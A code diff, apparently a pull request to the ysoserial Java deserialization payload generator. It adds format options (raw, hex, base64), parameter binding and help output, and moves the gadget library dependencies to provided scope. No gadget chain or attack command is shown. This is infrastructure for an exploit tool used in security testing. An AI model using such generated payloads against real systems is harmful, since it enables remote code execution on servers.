Dynamic loader #10

pom.xml

@@ -91,7 +91,21 @@
 
 
 		<!-- non-gadget dependencies -->
-
+		<dependency>
+        	<groupId>org.apache.ivy</groupId>
+        	<artifactId>ivy</artifactId>
+        	<version>2.4.0</version>
+        </dependency>
+        <dependency>
+        	<groupId>commons-io</groupId>
+        	<artifactId>commons-io</artifactId>
+        	<version>2.4</version>
+        </dependency>
+		<dependency>
+			<groupId>org.codehaus.groovy</groupId>
+			<artifactId>groovy</artifactId>
+			<version>2.4.6</version>
+		</dependency>
 		<dependency>
 			<groupId>org.reflections</groupId>
 			<artifactId>reflections</artifactId>
@@ -161,87 +175,98 @@
 			<groupId>commons-collections</groupId>
 			<artifactId>commons-collections</artifactId>
 			<version>3.1</version>
+			<scope>provided</scope>			
 		</dependency>
 		<dependency>
 			<groupId>org.beanshell</groupId>
 			<artifactId>bsh</artifactId>
 			<version>2.0b5</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>commons-beanutils</groupId>
 			<artifactId>commons-beanutils</artifactId>
 			<version>1.9.2</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.apache.commons</groupId>
 			<artifactId>commons-collections4</artifactId>
 			<version>4.0</version>
-		</dependency>
-		<dependency>
-			<groupId>org.codehaus.groovy</groupId>
-			<artifactId>groovy</artifactId>
-			<version>2.3.9</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.springframework</groupId>
 			<artifactId>spring-core</artifactId>
 			<version>4.1.4.RELEASE</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.springframework</groupId>
 			<artifactId>spring-beans</artifactId>
 			<version>4.1.4.RELEASE</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.hibernate</groupId>
 			<artifactId>hibernate-core</artifactId>
 			<version>4.3.11.Final</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.springframework</groupId>
 			<artifactId>spring-aop</artifactId>
 			<version>4.1.4.RELEASE</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>net.sf.json-lib</groupId>
 			<artifactId>json-lib</artifactId>
 			<classifier>jdk15</classifier>
+			<scope>provided</scope>
 			<version>2.4</version>
 		</dependency>
 		<dependency>
 			<groupId>commons-fileupload</groupId>
 			<artifactId>commons-fileupload</artifactId>
 			<version>1.3</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>com.mchange</groupId>
 			<artifactId>c3p0</artifactId>
 			<version>0.9.5.2</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>javax.servlet</groupId>
 			<artifactId>javax.servlet-api</artifactId>
 			<version>3.1.0</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>org.apache.myfaces.core</groupId>
 			<artifactId>myfaces-impl</artifactId>
 			<version>2.2.9</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>xalan</groupId>
 			<artifactId>xalan</artifactId>
 			<version>2.7.2</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>rome</groupId>
 			<artifactId>rome</artifactId>
 			<version>1.0</version>
+			<scope>provided</scope>
 		</dependency>
         <dependency>
             <groupId>org.python</groupId>
             <artifactId>jython-standalone</artifactId>
             <version>2.5.2</version>
+			<scope>provided</scope>
         </dependency>
 	</dependencies>
 
@@ -258,6 +283,7 @@
 					<groupId>org.hibernate</groupId>
 					<artifactId>hibernate-core</artifactId>
 					<version>5.0.7.Final</version>
+					<scope>provided</scope>
 				</dependency>
 			</dependencies>
 		</profile>
@@ -276,6 +302,7 @@
 					<groupId>org.mortbay.jasper</groupId>
 					<artifactId>apache-el</artifactId>
 					<version>8.0.27</version>
+					<scope>provided</scope>
 				</dependency>
 			</dependencies>
 		</profile>

src/main/java/ysoserial/GeneratePayload.java

@@ -1,29 +1,68 @@
 package ysoserial;
 
+import java.io.File;
+import java.io.FileInputStream;
 import java.io.PrintStream;
+import java.lang.reflect.Field;
+import java.net.URL;
 import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.Collections;
 import java.util.Comparator;
 import java.util.List;
+import java.util.Set;
+import java.util.TreeSet;
 
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.ObjectPayload.Utils;
-import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.Serializer.Format;
+import ysoserial.annotation.Bind;
+import ysoserial.interfaces.ObjectPayload;
+import ysoserial.payloads.Utils;
+import ysoserial.util.Arguments;
+import ysoserial.util.DependencyUtil;
+import ysoserial.util.Messages;
 
 @SuppressWarnings("rawtypes")
 public class GeneratePayload {
 
 	private static final int INTERNAL_ERROR_CODE = 70;
+
 	private static final int USAGE_CODE = 64;
 
+	public static class ToStringComparator implements Comparator<Object> {
+		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
+	}
+
 	public static void main(final String[] args) {
-		if (args.length != 2) {
+		if (args.length < 1) {
 			printUsage();
 			System.exit(USAGE_CODE);
 		}
-		final String payloadType = args[0];
-		final String command = args[1];
+		Format format = Format.Raw;
+
+		int genArgs = 0;
+		// Find generator args (as opposed to payload args)
+		for( int i = 0; i < args.length; i++ ) {
+			if ( !args[i].startsWith( "-" ) ) {
+				break;
+			}
+
+			if ( args[i].equals( "-raw" ) ) {
+				format = Format.Raw;
+			} else if ( args[i].equals( "-hex" ) ) { 
+				format = Format.Hex;
+			} else if ( args[i].equals( "-base64" ) ) {
+				format = Format.Base64;
+			}
+
+			genArgs++;
+		}
+
+		final String payloadType = args[genArgs++];
+
+		String[] newArgs = new String[ args.length - genArgs ];
+		System.arraycopy( args, genArgs, newArgs, 0, newArgs.length );
+
+		Arguments.push( newArgs );
 
 		final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
 		if (payloadClass == null) {
@@ -32,13 +71,21 @@ public static void main(final String[] args) {
 			System.exit(USAGE_CODE);
 			return; // make null analysis happy
 		}
-
+		
 		try {
-			final ObjectPayload payload = payloadClass.newInstance();
-			final Object object = payload.getObject(command);
-			PrintStream out = System.out;
-			Serializer.serialize(object, out);
-			ObjectPayload.Utils.releasePayload(payload, object);
+			try {
+				final ObjectPayload payload = payloadClass.newInstance();
+				Utils.wire( payload, newArgs );
+				Messages.println( "Retrieving payload object" );
+				final Object object = payload.getObject();
+				PrintStream out = System.out;
+				Messages.println( "Serializing payload object in format " + format.toString() );
+				Serializer.serialize(object, out, format);
+				Utils.releasePayload(payload, object);
+			} catch( IllegalArgumentException e ) {
+				System.err.println( "Invalid arguments for payload type '" + payloadType + "'" );
+				printHelp( payloadClass );
+			}
 		} catch (Throwable e) {
 			System.err.println("Error while generating or serializing payload");
 			e.printStackTrace();
@@ -47,20 +94,67 @@ public static void main(final String[] args) {
 		System.exit(0);
 	}
 
+	private static void printHelp(Class<? extends ObjectPayload> payloadClass) throws Exception {
+		System.err.println( "Y SO SERIAL?" );
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [format] " + payloadClass.getSimpleName() + " [params...]");
+		System.err.println( "Available formats: -raw, -hex, -base64" );
+		System.err.println( "Parameters for this payload type: " );
+
+		Set<String> params = new TreeSet<String>();
+
+		Class<?> cls = payloadClass;
+		while( cls != null ) {
+			for( Field f : cls.getDeclaredFields() ) {
+				if ( f.getAnnotation( Bind.class ) != null ) {
+					Bind binding = f.getAnnotation( Bind.class );
+					params.add( f.getName() + " [" + type(f) + "]: " + binding.helpText() );
+				}
+			}
+
+			cls = cls.getSuperclass();
+		}
+
+		for( String s : params ) {
+			System.err.println( " * " + s );
+		}
+	}
+
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
-		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [format] payload_type [params...]");
+		System.err.println( "Available formats: -raw, -hex, -base64" );
 		System.err.println("\tAvailable payload types:");
+		System.setProperty( "ysoserial.suppress.messages", "true" );
+
 		final List<Class<? extends ObjectPayload>> payloadClasses =
-			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
+			new ArrayList<Class<? extends ObjectPayload>>(Utils.getPayloadClasses());
 		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
 		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
-			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
+			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(DependencyUtil.getDependencies(payloadClass)));
 		}
 	}
 
-	public static class ToStringComparator implements Comparator<Object> {
-		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
+	private static String type(Field f) {
+		Class<?> type = f.getType();
+		if ( type.equals( String.class ) ) {
+			return "string";
+		} else if ( type.equals( URL.class ) ) {
+			return "url";
+		} else if ( type.equals( Integer.TYPE ) ) {
+			return "number";
+		} else if ( type.equals( Long.TYPE ) ) {
+			return "number";
+		} else if ( type.equals( Boolean.TYPE ) ) {
+			return "boolean";
+		} else if ( type.equals( File.class ) ) { 
+			return "filename";
+		} else if ( type.equals( FileInputStream.class ) ) {
+			return "filename";
+		} else if ( type.equals( ObjectPayload.class ) || ObjectPayload.class.isAssignableFrom( type ) ) {
+			return "payload name";
+		}
+
+		return "unknown";
 	}
 
 }

src/main/java/ysoserial/Serializer.java

@@ -1,12 +1,23 @@
 package ysoserial;
 
 import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
 import java.io.IOException;
 import java.io.ObjectOutputStream;
 import java.io.OutputStream;
 import java.util.concurrent.Callable;
 
+import org.apache.commons.codec.binary.Base64;
+import org.apache.commons.codec.binary.Hex;
+
 public class Serializer implements Callable<byte[]> {
+
+	public static enum Format { 
+		Hex,
+		Raw,
+		Base64
+	}
+
 	private final Object object;
 	public Serializer(Object object) {
 		this.object = object;
@@ -18,13 +29,23 @@ public byte[] call() throws Exception {
 
 	public static byte[] serialize(final Object obj) throws IOException {
 		final ByteArrayOutputStream out = new ByteArrayOutputStream();
-		serialize(obj, out);
+		serialize(obj, out, Format.Raw );
 		return out.toByteArray();
 	}
 
-	public static void serialize(final Object obj, final OutputStream out) throws IOException {
-		final ObjectOutputStream objOut = new ObjectOutputStream(out);
-		objOut.writeObject(obj);
+	public static void serialize(final Object obj, final OutputStream out, Format format) throws IOException {
+		if ( format.equals( Format.Raw ) ) {
+			final ObjectOutputStream objOut = new ObjectOutputStream(out);
+			objOut.writeObject(obj);
+		} else {
+			byte[] bytes = serialize( obj );
+			DataOutputStream dos = new DataOutputStream( out );
+			if ( format.equals( Format.Base64 ) ) {
+				dos.write( Base64.encodeBase64(bytes, false) );
+			} else if ( format.equals( Format.Hex ) ) {
+				dos.writeBytes( Hex.encodeHexString( bytes ) );
+			}
+		}
 	}
 
 }